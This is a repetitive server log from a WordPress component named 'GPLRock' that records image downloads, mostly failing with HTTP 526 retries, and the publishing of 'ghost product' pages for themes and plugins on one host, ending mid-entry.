vc-icon-finder-wpbakery-page-builder-icon-finder [02-Apr-2026 19:18:38 UTC] GPLRock: Image downloaded successfully for product vcity-online-browser-game (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-dd34512e.webp [02-Apr-2026 19:18:38 UTC] GPLRock: Using pre-downloaded image for product vcity-online-browser-game: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-dd34512e.webp [02-Apr-2026 19:18:38 UTC] GPLRock: Ghost product published with image - Product ID: vcity-online-browser-game [02-Apr-2026 19:18:38 UTC] GPLRock: Image download failed for product awake-creative-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:18:38 UTC] GPLRock: Image downloaded successfully for product gravity-forms-pardot-integration-gravity-forms-account-engagement-integration (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-68a80658.webp [02-Apr-2026 19:18:38 UTC] GPLRock: Using pre-downloaded image for product gravity-forms-pardot-integration-gravity-forms-account-engagement-integration: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-68a80658.webp [02-Apr-2026 19:18:38 UTC] GPLRock: Ghost product published with image - Product ID: gravity-forms-pardot-integration-gravity-forms-account-engagement-integration [02-Apr-2026 19:18:41 UTC] GPLRock: Image download failed for product awake-creative-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:18:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/awake---creative-portfolio-wordpress-theme-19759.webp for product awake-creative-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 19:18:43 UTC] GPLRock: Image download failed for product awake-creative-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:18:45 UTC] GPLRock: Image download failed for product awake-creative-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:18:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/awake---creative-portfolio-wordpress-theme-19759.webp for product awake-creative-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 19:18:47 UTC] GPLRock WARNING: Image download failed for product awake-creative-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/awake---creative-portfolio-wordpress-theme-19759.webp [02-Apr-2026 19:18:47 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: awake-creative-portfolio-wordpress-theme [02-Apr-2026 19:18:47 UTC] GPLRock: Image download failed for product delicious-mail (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:18:49 UTC] GPLRock: Image download failed for product delicious-mail (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:18:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/delicious-mail-28060.webp for product delicious-mail after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 19:18:52 UTC] GPLRock: Image download failed for product delicious-mail (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:18:54 UTC] GPLRock: Image download failed for product delicious-mail (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:18:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/delicious-mail-28060.webp for product delicious-mail after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 19:18:56 UTC] GPLRock WARNING: Image download failed for product delicious-mail. URL: https://meldwp.com/wp-content/uploads/delicious-mail-28060.webp [02-Apr-2026 19:18:56 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: delicious-mail [02-Apr-2026 19:28:41 UTC] GPLRock: Image download failed for product cloux-game-gaming-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:28:43 UTC] GPLRock: Image download failed for product cloux-game-gaming-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:28:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cloux--game--gaming-theme-29736.webp for product cloux-game-gaming-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 19:28:45 UTC] GPLRock: Image download failed for product cloux-game-gaming-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:28:47 UTC] GPLRock: Image download failed for product cloux-game-gaming-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:28:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cloux--game--gaming-theme-29736.webp for product cloux-game-gaming-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 19:28:49 UTC] GPLRock WARNING: Image download failed for product cloux-game-gaming-theme. URL: https://meldwp.com/wp-content/uploads/cloux--game--gaming-theme-29736.webp [02-Apr-2026 19:28:49 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: cloux-game-gaming-theme [02-Apr-2026 19:28:49 UTC] GPLRock: Image download failed for product hostfox-hosting-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:28:51 UTC] GPLRock: Image download failed for product hostfox-hosting-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:28:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hostfox--hosting-wordpress-14522.webp for product hostfox-hosting-wordpress after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 19:28:54 UTC] GPLRock: Image download failed for product hostfox-hosting-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:28:56 UTC] GPLRock: Image download failed for product hostfox-hosting-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:28:58 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hostfox--hosting-wordpress-14522.webp for product hostfox-hosting-wordpress after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 19:28:58 UTC] GPLRock WARNING: Image download failed for product hostfox-hosting-wordpress. URL: https://meldwp.com/wp-content/uploads/hostfox--hosting-wordpress-14522.webp [02-Apr-2026 19:28:58 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: hostfox-hosting-wordpress [02-Apr-2026 19:28:58 UTC] GPLRock: Image download failed for product sports-life-gym-and-fitness-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:29:00 UTC] GPLRock: Image download failed for product sports-life-gym-and-fitness-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:29:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sports--life---gym-and-fitness-wordpress-theme-492.webp for product sports-life-gym-and-fitness-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 19:29:02 UTC] GPLRock: Image download failed for product sports-life-gym-and-fitness-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:29:04 UTC] GPLRock: Image download failed for product sports-life-gym-and-fitness-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:29:06 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sports--life---gym-and-fitness-wordpress-theme-492.webp for product sports-life-gym-and-fitness-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 19:29:06 UTC] GPLRock WARNING: Image download failed for product sports-life-gym-and-fitness-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/sports--life---gym-and-fitness-wordpress-theme-492.webp [02-Apr-2026 19:29:06 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: sports-life-gym-and-fitness-wordpress-theme [02-Apr-2026 19:29:07 UTC] GPLRock: Image downloaded successfully for product brentwood-golf-course-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e4c9cb7c.webp [02-Apr-2026 19:29:07 UTC] GPLRock: Using pre-downloaded image for product brentwood-golf-course-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e4c9cb7c.webp [02-Apr-2026 19:29:07 UTC] GPLRock: Ghost product published with image - Product ID: brentwood-golf-course-wordpress-theme [02-Apr-2026 19:29:07 UTC] GPLRock: Image download failed for product vg-oregon-responsive-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:29:09 UTC] GPLRock: Image download failed for product vg-oregon-responsive-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:29:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/vg-oregon---responsive-woocommerce-wordpress-theme-24651.webp for product vg-oregon-responsive-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 19:29:11 UTC] GPLRock: Image download failed for product vg-oregon-responsive-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:29:13 UTC] GPLRock: Image download failed for product vg-oregon-responsive-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:29:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/vg-oregon---responsive-woocommerce-wordpress-theme-24651.webp for product vg-oregon-responsive-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 19:29:15 UTC] GPLRock WARNING: Image download failed for product vg-oregon-responsive-woocommerce-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/vg-oregon---responsive-woocommerce-wordpress-theme-24651.webp [02-Apr-2026 19:29:15 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: vg-oregon-responsive-woocommerce-wordpress-theme [02-Apr-2026 19:29:15 UTC] GPLRock: Image download failed for product sultan-one-page-business-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:29:18 UTC] GPLRock: Image download failed for product sultan-one-page-business-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:29:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sultan---one-page-business-wordpress-theme-5982.webp for product sultan-one-page-business-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 19:29:20 UTC] GPLRock: Image download failed for product sultan-one-page-business-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:29:22 UTC] GPLRock: Image download failed for product sultan-one-page-business-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:29:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sultan---one-page-business-wordpress-theme-5982.webp for product sultan-one-page-business-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 19:29:24 UTC] GPLRock WARNING: Image download failed for product sultan-one-page-business-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/sultan---one-page-business-wordpress-theme-5982.webp [02-Apr-2026 19:29:24 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: sultan-one-page-business-wordpress-theme [02-Apr-2026 19:29:24 UTC] GPLRock: Image downloaded successfully for product randai-theater-entertainment-performing-arts-fse-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-74d5a341.webp [02-Apr-2026 19:29:24 UTC] GPLRock: Using pre-downloaded image for product randai-theater-entertainment-performing-arts-fse-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-74d5a341.webp [02-Apr-2026 19:29:24 UTC] GPLRock: Ghost product published with image - Product ID: randai-theater-entertainment-performing-arts-fse-wordpress-theme [02-Apr-2026 19:29:24 UTC] GPLRock: Image downloaded successfully for product wieldy-react-admin-template-ant-design-and-redux (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3d3e35e1.webp [02-Apr-2026 19:29:24 UTC] GPLRock: Using pre-downloaded image for product wieldy-react-admin-template-ant-design-and-redux: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3d3e35e1.webp [02-Apr-2026 19:29:24 UTC] GPLRock: Ghost product published with image - Product ID: wieldy-react-admin-template-ant-design-and-redux [02-Apr-2026 19:29:24 UTC] GPLRock: Image download failed for product accu-healthcare-massage-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:29:27 UTC] GPLRock: Image download failed for product accu-healthcare-massage-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:29:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/accu---healthcare-massage-wordpress-theme-11381.webp for product accu-healthcare-massage-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 19:29:29 UTC] GPLRock: Image download failed for product accu-healthcare-massage-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:29:31 UTC] GPLRock: Image download failed for product accu-healthcare-massage-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:29:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/accu---healthcare-massage-wordpress-theme-11381.webp for product accu-healthcare-massage-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 19:29:33 UTC] GPLRock WARNING: Image download failed for product accu-healthcare-massage-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/accu---healthcare-massage-wordpress-theme-11381.webp [02-Apr-2026 19:29:33 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: accu-healthcare-massage-wordpress-theme [02-Apr-2026 19:29:33 UTC] GPLRock: Image download failed for product odear-multi-concept-creative-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:29:35 UTC] GPLRock: Image download failed for product odear-multi-concept-creative-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:29:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/odear---multi-concept-creative-wordpress-theme-12051.webp for product odear-multi-concept-creative-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 19:29:37 UTC] GPLRock: Image download failed for product odear-multi-concept-creative-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:29:40 UTC] GPLRock: Image download failed for product odear-multi-concept-creative-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:29:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/odear---multi-concept-creative-wordpress-theme-12051.webp for product odear-multi-concept-creative-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 19:29:42 UTC] GPLRock WARNING: Image download failed for product odear-multi-concept-creative-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/odear---multi-concept-creative-wordpress-theme-12051.webp [02-Apr-2026 19:29:42 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: odear-multi-concept-creative-wordpress-theme [02-Apr-2026 19:29:51 UTC] GPLRock: Image download failed for product world-wide-news-magazine-responsive-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:29:54 UTC] GPLRock: Image download failed for product world-wide-news-magazine-responsive-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:29:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/world-wide-news---magazine-responsive-wordpress-theme-32317.webp for product world-wide-news-magazine-responsive-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 19:29:56 UTC] GPLRock: Image download failed for product world-wide-news-magazine-responsive-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:29:58 UTC] GPLRock: Image download failed for product world-wide-news-magazine-responsive-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:30:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/world-wide-news---magazine-responsive-wordpress-theme-32317.webp for product world-wide-news-magazine-responsive-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 19:30:00 UTC] GPLRock WARNING: Image download failed for product world-wide-news-magazine-responsive-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/world-wide-news---magazine-responsive-wordpress-theme-32317.webp [02-Apr-2026 19:30:00 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: world-wide-news-magazine-responsive-wordpress-theme [02-Apr-2026 19:30:00 UTC] GPLRock: Image download failed for product aports-single-property-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:30:02 UTC] GPLRock: Image download failed for product aports-single-property-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:30:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/aports---single-property-wordpress-theme-23169.webp for product aports-single-property-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 19:30:04 UTC] GPLRock: Image download failed for product aports-single-property-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:30:07 UTC] GPLRock: Image download failed for product aports-single-property-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:30:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/aports---single-property-wordpress-theme-23169.webp for product aports-single-property-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 19:30:09 UTC] GPLRock WARNING: Image download failed for product aports-single-property-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/aports---single-property-wordpress-theme-23169.webp [02-Apr-2026 19:30:09 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: aports-single-property-wordpress-theme [02-Apr-2026 19:30:09 UTC] GPLRock: Image download failed for product devfox-it-solutions-and-services-wordpress-theme-rtl (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:30:11 UTC] GPLRock: Image download failed for product devfox-it-solutions-and-services-wordpress-theme-rtl (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:30:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/devfox---it-solutions-and-services-wordpress-theme--rtl-23929.webp for product devfox-it-solutions-and-services-wordpress-theme-rtl after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 19:30:14 UTC] GPLRock: Image download failed for product devfox-it-solutions-and-services-wordpress-theme-rtl (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:30:16 UTC] GPLRock: Image download failed for product devfox-it-solutions-and-services-wordpress-theme-rtl (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:30:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/devfox---it-solutions-and-services-wordpress-theme--rtl-23929.webp for product devfox-it-solutions-and-services-wordpress-theme-rtl after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 19:30:18 UTC] GPLRock WARNING: Image download failed for product devfox-it-solutions-and-services-wordpress-theme-rtl. URL: https://meldwp.com/wp-content/uploads/devfox---it-solutions-and-services-wordpress-theme--rtl-23929.webp [02-Apr-2026 19:30:18 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: devfox-it-solutions-and-services-wordpress-theme-rtl [02-Apr-2026 19:30:18 UTC] GPLRock: Image download failed for product krsel-car-repair-auto-wash-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:30:20 UTC] GPLRock: Image download failed for product krsel-car-repair-auto-wash-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:30:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/krsel---car-repair--auto-wash-wordpress-theme-21689.webp for product krsel-car-repair-auto-wash-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 19:30:22 UTC] GPLRock: Image download failed for product krsel-car-repair-auto-wash-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:30:24 UTC] GPLRock: Image download failed for product krsel-car-repair-auto-wash-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:30:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/krsel---car-repair--auto-wash-wordpress-theme-21689.webp for product krsel-car-repair-auto-wash-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 19:30:26 UTC] GPLRock WARNING: Image download failed for product krsel-car-repair-auto-wash-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/krsel---car-repair--auto-wash-wordpress-theme-21689.webp [02-Apr-2026 19:30:26 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: krsel-car-repair-auto-wash-wordpress-theme [02-Apr-2026 19:30:27 UTC] GPLRock: Image download failed for product logistic-business-transport-trucking-logistics-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:30:29 UTC] GPLRock: Image download failed for product logistic-business-transport-trucking-logistics-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:30:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/logistic-business---transport--trucking-logistics-wordpress-theme-28767.webp for product logistic-business-transport-trucking-logistics-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 19:30:31 UTC] GPLRock: Image download failed for product logistic-business-transport-trucking-logistics-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:30:33 UTC] GPLRock: Image download failed for product logistic-business-transport-trucking-logistics-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:30:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/logistic-business---transport--trucking-logistics-wordpress-theme-28767.webp for product logistic-business-transport-trucking-logistics-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 19:30:35 UTC] GPLRock WARNING: Image download failed for product logistic-business-transport-trucking-logistics-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/logistic-business---transport--trucking-logistics-wordpress-theme-28767.webp [02-Apr-2026 19:30:35 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: logistic-business-transport-trucking-logistics-wordpress-theme [02-Apr-2026 19:30:35 UTC] GPLRock: Image download failed for product playerx-gaming-and-esports-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:30:38 UTC] GPLRock: Image download failed for product playerx-gaming-and-esports-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:30:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/playerx---gaming-and-esports-wordpress-theme-10251.webp for product playerx-gaming-and-esports-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 19:30:40 UTC] GPLRock: Image download failed for product playerx-gaming-and-esports-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:30:42 UTC] GPLRock: Image download failed for product playerx-gaming-and-esports-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:30:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/playerx---gaming-and-esports-wordpress-theme-10251.webp for product playerx-gaming-and-esports-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 19:30:44 UTC] GPLRock WARNING: Image download failed for product playerx-gaming-and-esports-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/playerx---gaming-and-esports-wordpress-theme-10251.webp [02-Apr-2026 19:30:44 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: playerx-gaming-and-esports-wordpress-theme [02-Apr-2026 19:30:44 UTC] GPLRock: Image downloaded successfully for product bakevo-bakery-cookies-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c504bdef.webp [02-Apr-2026 19:30:44 UTC] GPLRock: Using pre-downloaded image for product bakevo-bakery-cookies-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c504bdef.webp [02-Apr-2026 19:30:44 UTC] GPLRock: Ghost product published with image - Product ID: bakevo-bakery-cookies-wordpress-theme [02-Apr-2026 19:30:45 UTC] GPLRock: Image download failed for product wordpress-photography-theme-nifty-fifty (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:30:47 UTC] GPLRock: Image download failed for product wordpress-photography-theme-nifty-fifty (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:30:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wordpress-photography-theme---nifty-fifty-27692.webp for product wordpress-photography-theme-nifty-fifty after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 19:30:49 UTC] GPLRock: Image download failed for product wordpress-photography-theme-nifty-fifty (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:30:51 UTC] GPLRock: Image download failed for product wordpress-photography-theme-nifty-fifty (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:30:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wordpress-photography-theme---nifty-fifty-27692.webp for product wordpress-photography-theme-nifty-fifty after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 19:30:53 UTC] GPLRock WARNING: Image download failed for product wordpress-photography-theme-nifty-fifty. URL: https://meldwp.com/wp-content/uploads/wordpress-photography-theme---nifty-fifty-27692.webp [02-Apr-2026 19:30:53 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wordpress-photography-theme-nifty-fifty [02-Apr-2026 19:30:53 UTC] GPLRock: Image download failed for product windazo-plastic-windows-and-doors-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:30:55 UTC] GPLRock: Image download failed for product windazo-plastic-windows-and-doors-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:30:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/windazo---plastic-windows-and-doors-wordpress-theme-15774.webp for product windazo-plastic-windows-and-doors-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 19:30:58 UTC] GPLRock: Image download failed for product windazo-plastic-windows-and-doors-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:31:00 UTC] GPLRock: Image download failed for product windazo-plastic-windows-and-doors-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:31:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/windazo---plastic-windows-and-doors-wordpress-theme-15774.webp for product windazo-plastic-windows-and-doors-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 19:31:02 UTC] GPLRock WARNING: Image download failed for product windazo-plastic-windows-and-doors-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/windazo---plastic-windows-and-doors-wordpress-theme-15774.webp [02-Apr-2026 19:31:02 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: windazo-plastic-windows-and-doors-wordpress-theme [02-Apr-2026 19:31:02 UTC] GPLRock: Image download failed for product ocularus-minimal-photography-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:31:04 UTC] GPLRock: Image download failed for product ocularus-minimal-photography-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:31:06 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ocularus---minimal-photography-wordpress-theme-9557.webp for product ocularus-minimal-photography-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 19:31:07 UTC] GPLRock: Image download failed for product ocularus-minimal-photography-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:31:09 UTC] GPLRock: Image download failed for product ocularus-minimal-photography-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:31:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ocularus---minimal-photography-wordpress-theme-9557.webp for product ocularus-minimal-photography-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 19:31:11 UTC] GPLRock WARNING: Image download failed for product ocularus-minimal-photography-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/ocularus---minimal-photography-wordpress-theme-9557.webp [02-Apr-2026 19:31:11 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ocularus-minimal-photography-wordpress-theme [02-Apr-2026 19:31:38 UTC] GPLRock: Image download failed for product callix-creative-agency-wordpress-theme-rtl (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:31:40 UTC] GPLRock: Image download failed for product callix-creative-agency-wordpress-theme-rtl 